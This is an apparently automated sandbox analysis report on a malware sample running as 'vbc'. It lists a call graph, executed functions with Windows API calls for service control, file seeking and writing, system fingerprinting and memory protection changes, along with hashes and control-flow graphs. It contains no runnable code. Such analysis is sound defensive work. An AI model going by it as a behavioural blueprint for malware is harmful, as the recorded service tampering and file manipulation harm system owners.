f67f6b GetVolumeInformationW 61800->61805 61800->61806 61801 f68953 AllocateAndInitializeSid 61801->61802 61802->61781 61802->61782 61802->61783 61802->61784 61802->61785 61802->61788 61802->61789 61802->61790 61802->61796 61802->61799 61802->61800 61802->61801 61804 f6890b LocalFree 61802->61804 61802->61806 61803->61806 61804->61802 61805->61800 61806->61780 61807 f4fbc6 61809 f4ea10 61807->61809 61808 f4f8d4 SetFilePointerEx 61808->61809 61809->61808 61811 f4e539 61809->61811 61816 f4e590 61809->61816 61810 f4e59e SetFilePointerEx 61810->61816 61812 f4e6ed 61813 f45f10 SetFilePointerEx 61812->61813 61815 f4e70a 61813->61815 61814 f4e7ac SetFilePointerEx 61814->61816 61816->61810 61816->61811 61816->61812 61816->61814 61817 f502c6 61819 f4fe2b 61817->61819 61818 f4fe39 61820 f4fe4b SetFilePointerEx 61818->61820 61824 f4e539 61818->61824 61819->61817 61819->61818 61819->61824 61828 f4e590 61819->61828 61821 f4fb97 61820->61821 61822 f4e7ac SetFilePointerEx 61822->61828 61823 f4e6ed 61826 f45f10 SetFilePointerEx 61823->61826 61825 f4e59e SetFilePointerEx 61825->61828 61827 f4e70a 61826->61827 61828->61822 61828->61823 61828->61824 61828->61825 61829 f4e687 61830 f4e8d6 WriteFile 61829->61830 61831 f4e6a8 61829->61831 61836 f4e590 61830->61836 61831->61830 61831->61836 61832 f4e59e SetFilePointerEx 61832->61836 61833 f4e6ed 61834 f45f10 SetFilePointerEx 61833->61834 61837 f4e70a 61834->61837 61835 f4e7ac SetFilePointerEx 61835->61836 61836->61832 61836->61833 61836->61835 61838 f4e539 61836->61838 61839 f50106 61840 f4e7f3 ReadFile 61839->61840 61842 f4f9ac 61839->61842 61841 f4e7ee 61840->61841 61849 f4e590 61840->61849 61843 f4e59e SetFilePointerEx 61843->61849 61844 f4e539 61845 f4e6ed 61846 f45f10 SetFilePointerEx 61845->61846 61848 f4e70a 61846->61848 61847 f4e7ac SetFilePointerEx 61847->61849 61849->61843 61849->61844 61849->61845 61849->61847 61850 f50003 61851 f45f10 SetFilePointerEx 61850->61851 61852 f5000a 61851->61852 61853 f4520c 61856 f6cbd0 61853->61856 61855 f45211 61874 f6be50 61856->61874 61857 f6c168 61893 f6a905 LocalFree 61857->61893 61859 f45d20 2 API calls 61859->61874 61860 f6c78e CloseServiceHandle 61860->61874 61861 f6bffd StrStrIW 61861->61874 61862 f6c706 StrStrIW 61862->61874 61864 f6bf68 StrStrIW 61864->61874 61865 f6c72b StrStrIW 61865->61874 61866 f6c0fd CloseServiceHandle 61866->61874 61867 f6c399 StrStrIW 61870 f6c3a9 61867->61870 61867->61874 61868 f6bf7e 61871 f6c7e4 StartServiceW 61868->61871 61872 f6c36b OpenServiceW 61868->61872 61870->61855 61871->61874 61872->61874 61873 f6c65a ChangeServiceConfigW 61873->61874 61875 f6bfe9 61873->61875 61874->61855 61874->61856 61874->61857 61874->61859 61874->61860 61874->61861 61874->61862 61874->61864 61874->61865 61874->61866 61874->61867 61874->61868 61874->61871 61874->61873 61874->61875 61876 f4ce90 61874->61876 61892 f6a350 CloseServiceHandle 61874->61892 61875->61855 61887 f4cc9b 61876->61887 61877 f4d5c5 CreateFileW 61877->61887 61878 f4d729 GetFileSizeEx 61880 f4d8a1 CloseHandle 61878->61880 61878->61887 61880->61887 61881 f4d42a CloseHandle 61881->61887 61882 f4cd5c lstrcmpiW 61882->61887 61883 f4cca0 lstrcmpiW 61883->61887 61885 f4d049 SetFilePointerEx 61885->61887 61886 f4cc92 61886->61874 61887->61874 61887->61876 61887->61877 61887->61878 61887->61880 61887->61881 61887->61882 61887->61883 61887->61885 61887->61886 61888 f45d20 VirtualAlloc VirtualFree 61887->61888 61889 f4d378 CloseHandle 61887->61889 61890 f4d426 61887->61890 61891 f4cfbb GetFileTime 61887->61891 61894 f48937 VirtualAlloc VirtualFree 61887->61894 61895 f48470 VirtualAlloc VirtualFree 61887->61895 61888->61887 61889->61887 61890->61880 61890->61881 61891->61887 61892->61874 61893->61875 61894->61887 61896 f4958f 61898 f48e26 61896->61898 61897 f4b180 4 API calls 61897->61898 61898->61897 61899 f484ad 61898->61899 61900 70b0ef0 61901 70b0efc 61900->61901 61902 70b0f07 61901->61902 61905 70b22d9 61901->61905 61908 70b514a 61901->61908 61911 70bf3a8 61905->61911 61910 70bf3a8 VirtualProtect 61908->61910 61909 70b516c 61910->61909 61913 70bf3cf 61911->61913 61915 70bf4c0 61913->61915 61916 70bf509 VirtualProtect 61915->61916 61918 70b22f5 61916->61918 61919 f4b80f 61920 f4b828 WriteFile 61919->61920 61921 f4bb0a 61923 f4bb28 61921->61923 61922 f49cb2 61923->61922 61924 f4bdd0 61923->61924 61931 f4a7d8 61923->61931 61925 f4bdd4 SetFilePointerEx 61924->61925 61928 f4b9fe 61924->61928 61925->61924 61926 f4a9a0 GetFileSize 61926->61931 61936 f484ad 61926->61936 61927 f4be1c 61928->61927 61929 f4bd43 SetFilePointerEx 61928->61929 61930 f4bd68 61929->61930 61931->61926 61932 f49ad5 61931->61932 61931->61936 61937 f48e26 61931->61937 61934 f45f10 SetFilePointerEx 61932->61934 61932->61936 61933 f4b180 4 API calls 61933->61937 61935 f49aea 61934->61935 61937->61933 61937->61936

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00F6CBD0 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 418COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: d$w
                                                                                                                                                                      • API String ID: 0-2400632791
                                                                                                                                                                      • Opcode ID: a1a0c2e952d37856a68cef45baed786306aee67e0cbcf24f09bf12ec603c5637
                                                                                                                                                                      • Instruction ID: 79ba990036e9d1850779055a0b1d3d30286f1685b70b5dea109740e32a481210
                                                                                                                                                                      • Opcode Fuzzy Hash: a1a0c2e952d37856a68cef45baed786306aee67e0cbcf24f09bf12ec603c5637
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EC12721E0C380AFDA359A648C19B753B649F72770F8D0156E5D6CA0F3D71A9C44B6E2
                                                                                                                                                                      Function 00F68550 Relevance: 20.0, APIs: 13, Instructions: 515COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastwsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2587402804-0
                                                                                                                                                                      • Opcode ID: c15d6a15d2e8a02e1cd25b4513d9cea5a3604068d2d658e054be4d623b898f20
                                                                                                                                                                      • Instruction ID: 7f2ac9fb20d102d1aecaab24aaafb8d3728c5cde9a893226e0d2789502c9a7d9
                                                                                                                                                                      • Opcode Fuzzy Hash: c15d6a15d2e8a02e1cd25b4513d9cea5a3604068d2d658e054be4d623b898f20
                                                                                                                                                                      • Instruction Fuzzy Hash: 30F13761D0C381AACB3556288C19B753BA05B727F4F5C0B8EE562971F2DD658C0BB323
                                                                                                                                                                      Function 00F48286 Relevance: 19.1, APIs: 8, Strings: 2, Instructions: 1640COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,00000008), ref: 00F4838F
                                                                                                                                                                      • CloseHandle.KERNELBASE ref: 00F4839F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleOpenProcessToken
                                                                                                                                                                      • String ID: $AQu
                                                                                                                                                                      • API String ID: 3879341014-1472930311
                                                                                                                                                                      • Opcode ID: 3f5860abf9943705f6f1761d6aed33b7c52103a98d3a9bdc559da42b1b15551d
                                                                                                                                                                      • Instruction ID: 40ea2fea841611aa64a72de268ebc223a513376f393fbc79997ca6f8b5365e30
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f5860abf9943705f6f1761d6aed33b7c52103a98d3a9bdc559da42b1b15551d
                                                                                                                                                                      • Instruction Fuzzy Hash: 78B20331E0C3819BCB369B1888446357F60ABA3735F5D82DADE85CB1A3D6659C0AF353
                                                                                                                                                                      Function 00F4DF57 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1c10da4cabbb9f6fa63b6073af8339c1632afd2cbf252d8cc352f4c8bf6857c0
                                                                                                                                                                      • Instruction ID: cf14d31361f8306993cf8b8ab5dbbf172e014c731d29ba5d6e2ac482e47ee7be
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c10da4cabbb9f6fa63b6073af8339c1632afd2cbf252d8cc352f4c8bf6857c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 84E02B5EE4820075DB391E189C55D387D5476B5730E981716DC7A421D096965E043053
                                                                                                                                                                      Function 00F4CE90 Relevance: 14.1, APIs: 9, Instructions: 648COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dff88ddd41cfaf2dfdc34ab88f9b967fe7d504408445125d40944be4b6b3ed3c
                                                                                                                                                                      • Instruction ID: 961a1228a227ab041fa1b94f435cbe9621185b420f28975a810bbb53f9868b93
                                                                                                                                                                      • Opcode Fuzzy Hash: dff88ddd41cfaf2dfdc34ab88f9b967fe7d504408445125d40944be4b6b3ed3c
                                                                                                                                                                      • Instruction Fuzzy Hash: D1221D21D0E3809FDB768B2888187367FA05FA2734F0D559AEC95471E2D6799D08F3A3
                                                                                                                                                                      Function 00F4AD10 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: tu
                                                                                                                                                                      • API String ID: 0-2479440269
                                                                                                                                                                      • Opcode ID: 041eb42ef0ba21f1f17647b44505322d585c23608eab0971a012b00da6138b0d
                                                                                                                                                                      • Instruction ID: 926d147ed607f142e72311e02efd8f53ddaaf22596edc79b79dada8a87c4c89e
                                                                                                                                                                      • Opcode Fuzzy Hash: 041eb42ef0ba21f1f17647b44505322d585c23608eab0971a012b00da6138b0d
                                                                                                                                                                      • Instruction Fuzzy Hash: 09C10426D0E3805BDB768628481473A7FA06FA2770F4D558AEC858B1E3D769CC05F393
                                                                                                                                                                      Function 00F4AE3A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: SWVtvut$tu
                                                                                                                                                                      • API String ID: 0-794884318
                                                                                                                                                                      • Opcode ID: ec4e90ef424b724876babbd535a61fbaa51e0266815ebecec36beaa531363642
                                                                                                                                                                      • Instruction ID: 3644b8fb620b1fb36c4ed454b3aed4bb047fcebee359931f4c0a8403190dd776
                                                                                                                                                                      • Opcode Fuzzy Hash: ec4e90ef424b724876babbd535a61fbaa51e0266815ebecec36beaa531363642
                                                                                                                                                                      • Instruction Fuzzy Hash: 80917461D4D3819ED722CB298814777BFA05BA2370F0D868AECA58B1E3D2748D08F753
                                                                                                                                                                      Function 00F4B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3057 f4b180-f4b18f 3058 f4b2a3 3057->3058 3059 f4b2a5 3058->3059 3060 f4b306-f4b30b 3058->3060 3059->3060 3061 f4b2a7-f4b2c0 SetFilePointerEx 3059->3061 3066 f4b196-f4b1ba 3060->3066 3067 f4b23b 3060->3067 3064 f4b2c6 3061->3064 3065 f4b38d-f4b395 3061->3065 3064->3065 3068 f4b2cc-f4b2d0 3064->3068 3072 f4b3a6-f4b3ac 3066->3072 3073 f4b1c0 3066->3073 3067->3066 3069 f4b241 3067->3069 3070 f4b2d6 3068->3070 3071 f4b1df-f4b1e6 3068->3071 3069->3060 3076 f4b247 3069->3076 3070->3071 3077 f4b2dc-f4b2de 3070->3077 3074 f4b3b2-f4b3b7 3072->3074 3075 f4b328-f4b346 SetFilePointerEx 3072->3075 3073->3072 3078 f4b1c6-f4b1d3 3073->3078 3081 f4b322 3076->3081 3082 f4b24d 3076->3082 3079 f4b2e0-f4b2ed WriteFile 3077->3079 3078->3079 3080 f4b1d9 3078->3080 3080->3071 3080->3079 3081->3075 3084 f4b0d0-f4b0d8 SetFilePointerEx 3081->3084 3082->3081 3083 f4b253-f4b262 3082->3083 3085 f4b054-f4b061 3084->3085 3086 f4b0de-f4b0e2 3084->3086 3086->3057
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B2BA
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,00000004,?,00000000), ref: 00F4B2E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$PointerWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 539440098-0
                                                                                                                                                                      • Opcode ID: 689bbe895197017e3100b6c9de269d6d4086c1e24d7567a1a697849ea8add19f
                                                                                                                                                                      • Instruction ID: 3c970b5888d6fcdda2e6e3a310fae8d3484dd13b152c3f6e1d5014f40a599a59
                                                                                                                                                                      • Opcode Fuzzy Hash: 689bbe895197017e3100b6c9de269d6d4086c1e24d7567a1a697849ea8add19f
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C31727180C3849ED7118F2A881977BBFE4AF96734F48854DEC9486293D3B9D908B753
                                                                                                                                                                      Function 09F1EEB0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3089 9f1eeb0-9f1eed6 3092 9f1ef06-9f1ef0e 3089->3092 3093 9f1eed8-9f1ef00 call 9f1c3ac call 9f1c3e4 3089->3093 3094 9f1ef10-9f1ef15 call 9f1c4dc 3092->3094 3095 9f1ef54-9f1ef8e call 9f1c4e8 3092->3095 3093->3092 3103 9f1f10c-9f1f132 3093->3103 3100 9f1ef1a-9f1ef4f 3094->3100 3113 9f1ef94-9f1efdf 3095->3113 3114 9f1f139-9f1f16b 3095->3114 3110 9f1efe2-9f1f044 call 9f1c3ac call 9f1c4f4 3100->3110 3103->3114 3139 9f1f100-9f1f10b 3110->3139 3140 9f1f04a-9f1f057 3110->3140 3113->3110 3129 9f1f172-9f1f964 CreateWindowExW 3114->3129 3147 9f1f966-9f1f96c 3129->3147 3148 9f1f96d-9f1f9d8 3129->3148 3144 9f1f05d-9f1f08a call 9f1c3ac call 9f1c4e8 3140->3144 3145 9f1f0fc-9f1f0fe 3140->3145 3144->3145 3161 9f1f08c-9f1f099 3144->3161 3145->3129 3145->3139 3147->3148 3156 9f1f9e5 3148->3156 3157 9f1f9da-9f1f9dd 3148->3157 3160 9f1f9e6 3156->3160 3157->3156 3160->3160 3161->3145 3162 9f1f09b-9f1f0b2 call 9f1c3ac call 9f1c500 3161->3162 3167 9f1f0b4-9f1f0bd call 9f1c4f4 3162->3167 3168 9f1f0bf-9f1f0ee call 9f1c4f4 3162->3168 3167->3145 3168->3145 3176 9f1f0f0-9f1f0fa 3168->3176 3176->3145 3176->3168
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 09F1C3AC: GetModuleHandleW.KERNELBASE(?), ref: 09F1D6BA
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandleModuleWindow
                                                                                                                                                                      • String ID: 0$[A@i^
                                                                                                                                                                      • API String ID: 1178124398-1524683153
                                                                                                                                                                      • Opcode ID: c7195831ca29befead0414fc1bf3cf152a7fdf075fb9c5b4a6f75413d636c864
                                                                                                                                                                      • Instruction ID: f347b9eb4995408eca00d0252c40e3dab3fcbc2b58eb350b7aa713d642214a7a
                                                                                                                                                                      • Opcode Fuzzy Hash: c7195831ca29befead0414fc1bf3cf152a7fdf075fb9c5b4a6f75413d636c864
                                                                                                                                                                      • Instruction Fuzzy Hash: 72C13974A007099FDB14EF69D890AAEBBF1FF88300F108569E40ADB351DB74A945CF95
                                                                                                                                                                      Function 00F4E64F Relevance: 4.7, APIs: 3, Instructions: 244COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3178 f4e64f-f4e651 3179 f4e6c4 3178->3179 3180 f4e6c7-f4e6d2 3179->3180 3181 f4e6d8 3180->3181 3182 f4e8ea 3180->3182 3181->3182 3185 f4e6de 3181->3185 3183 f4e8f0 3182->3183 3184 f4e5c2-f4e5d8 3182->3184 3183->3184 3186 f4e8f6-f4e906 3183->3186 3187 f4e59e-f4e5b4 SetFilePointerEx 3184->3187 3188 f4e5da 3184->3188 3189 f4e908 3186->3189 3190 f4e5ba 3187->3190 3191 f4e9db-f4e9e0 3187->3191 3192 f4e5e0 3188->3192 3193 f4e852 3188->3193 3197 f4e974-f4e97b 3189->3197 3198 f4e90c 3189->3198 3190->3191 3199 f4e5c0 3190->3199 3195 f4e9e6 3191->3195 3196 f4e71b-f4e8cf 3191->3196 3192->3193 3200 f4e5e6 3192->3200 3193->3187 3194 f4e858-f4e869 3193->3194 3201 f4e796-f4e79f 3194->3201 3202 f4e86f 3194->3202 3195->3196 3203 f4e9ec-f4ea00 3195->3203 3196->3182 3198->3189 3204 f4e90e 3198->3204 3199->3184 3211 f4e7a5 3201->3211 3212 f4e6df 3201->3212 3206 f4e94e 3202->3206 3207 f4ea06-f4ea0b 3203->3207 3208 f4e671-f4e675 3203->3208 3209 f4e914-f4e919 3204->3209 3210 f4e57f-f4e8b4 3204->3210 3206->3201 3213 f4e954-f4e958 3206->3213 3214 f4f595-f4f59c 3207->3214 3220 f4e887-f4e88a 3208->3220 3221 f4e67b 3208->3221 3217 f4e8a3-f4e8b0 3209->3217 3218 f4e91b-f4e920 3209->3218 3248 f4e8b6-f4e8ba 3210->3248 3211->3212 3228 f4e727 3211->3228 3215 f4e9c0-f4e9cb 3212->3215 3216 f4e6ed-f4e705 call f45f10 3212->3216 3213->3180 3234 f4e95e 3213->3234 3230 f4e9d1 3215->3230 3231 f4e7ac-f4e7bc SetFilePointerEx 3215->3231 3236 f4e70a-f4e70f 3216->3236 3226 f4e926 3218->3226 3227 f4e89d 3218->3227 3221->3220 3223 f4e681 3221->3223 3232 f4e5e7 3223->3232 3233 f4e688-f4e692 3223->3233 3226->3227 3237 f4e92c-f4eb95 3226->3237 3227->3217 3235 f4e935-f4e937 3227->3235 3240 f4e590 3228->3240 3241 f4e72d 3228->3241 3230->3231 3243 f4e9d7-f4e9d9 3230->3243 3238 f4e7c2-f4e7c8 3231->3238 3239 f4e648-f4e651 3231->3239 3232->3248 3249 f4e5ed 3232->3249 3245 f4e964 3234->3245 3246 f4e779-f4e77c 3234->3246 3253 f4e93c 3235->3253 3250 f4e7ce 3238->3250 3251 f4e879 3238->3251 3239->3179 3240->3194 3244 f4e596-f4e59c 3240->3244 3241->3240 3252 f4e733 3241->3252 3243->3191 3244->3187 3245->3246 3261 f4e96a-f4e96d 3245->3261 3256 f4e782 3246->3256 3257 f4e62e-f4e637 3246->3257 3259 f4e8c0 3248->3259 3260 f4e6ae-f4e6c2 3248->3260 3262 f4e5f3 3249->3262 3263 f4e74d 3249->3263 3250->3251 3264 f4e7d4-f4e7e9 3250->3264 3251->3220 3252->3201 3265 f4e735 3252->3265 3253->3203 3266 f4e942 3253->3266 3256->3257 3268 f4e788 3256->3268 3270 f4e822-f4e824 3257->3270 3283 f4e63d 3257->3283 3259->3260 3269 f4e8c6-f4e8ce 3259->3269 3260->3233 3261->3197 3262->3263 3271 f4e5f9-f4e5fb 3262->3271 3263->3246 3267 f4e984-f4e989 3263->3267 3264->3253 3264->3270 3272 f4e5fd-f4e5ff 3265->3272 3273 f4e73b-f4e741 3265->3273 3266->3203 3274 f4e948 3266->3274 3267->3210 3279 f4e98f 3267->3279 3268->3260 3277 f4e78e 3268->3277 3269->3214 3270->3180 3278 f4e82a 3270->3278 3271->3272 3280 f4e601-f4e618 3272->3280 3273->3248 3284 f4e747-f4e74c 3273->3284 3274->3198 3275 f4e94a 3274->3275 3275->3198 3282 f4e94c 3275->3282 3277->3184 3285 f4e794 3277->3285 3278->3280 3286 f4e830-f4e835 3278->3286 3279->3210 3287 f4e995 3279->3287 3282->3206 3283->3270 3288 f4e643-f4e647 3283->3288 3285->3201 3287->3215 3288->3239
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 862a4f9b6626ba9db815b71ea64d41f9ee5be2df1fef5e1423a990a0803da14d
                                                                                                                                                                      • Instruction ID: 7571d3dae737f20b658fb30c74faa3c5c5806138710011aa79954eab0fb33b90
                                                                                                                                                                      • Opcode Fuzzy Hash: 862a4f9b6626ba9db815b71ea64d41f9ee5be2df1fef5e1423a990a0803da14d
                                                                                                                                                                      • Instruction Fuzzy Hash: 00918431D0D3819EDB228F28880477A7FA07F66734F49869EEC958A1D2D7759C08F752
                                                                                                                                                                      Function 00F67DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 3289 f67df0-f67dfa 3290 f67e00 3289->3290 3291 f68288-f6829a call f50d80 3289->3291 3290->3291 3293 f67e06-f67e15 GetComputerNameW 3290->3293 3298 f682a0 3291->3298 3299 f6851e-f6852d call f50d80 3291->3299 3294 f682b6-f682bb 3293->3294 3295 f67e1b 3293->3295 3295->3294 3297 f67e21-f67e2d 3295->3297 3298->3299 3301 f682a6 3298->3301 3303 f67dbc-f67dce 3301->3303 3304 f682ac 3301->3304 3311 f67d35 3303->3311 3312 f67d6c-f67d80 GetVolumeInformationW 3303->3312 3307 f682b2-f682b4 3304->3307 3308 f67d20-f67d2b 3304->3308 3307->3294 3309 f67d61-f67d68 3308->3309 3310 f67d2d-f67d94 3308->3310 3315 f67de5-f67dea 3309->3315 3316 f67d6a 3309->3316 3310->3309 3320 f67d96 3310->3320 3311->3312 3314 f67d37-f67d39 3311->3314 3317 f67d3b-f67d46 3314->3317 3318 f67d83-f67d8c GetWindowsDirectoryW 3315->3318 3319 f67dec 3315->3319 3316->3312 3316->3315 3321 f67d97-f67d98 3317->3321 3322 f67d48-f67dac 3317->3322 3318->3317 3324 f67d8e-f67da6 3318->3324 3319->3318 3323 f67dee 3319->3323 3320->3321 3325 f67de2 3321->3325 3326 f67d9a-f67d9f 3321->3326 3322->3321 3330 f67dae-f67db3 3322->3330 3323->3289 3324->3303 3329 f67da8 3324->3329 3329->3303 3331 f67daa-f67dba 3329->3331 3331->3303
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: 965e4073ba8491133caa4bffc42209f091d6db640bd5f686c709c5a3297cbf92
                                                                                                                                                                      • Instruction ID: ddee401455ebd6cc6be3753e3680b6136e633cb6be818fad0346b061760998c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 965e4073ba8491133caa4bffc42209f091d6db640bd5f686c709c5a3297cbf92
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F216771E4C3047BEA3577148C06FB53A346F62B7CF884D8AF588551D2D5686C09B263
                                                                                                                                                                      Function 00F4B665 Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
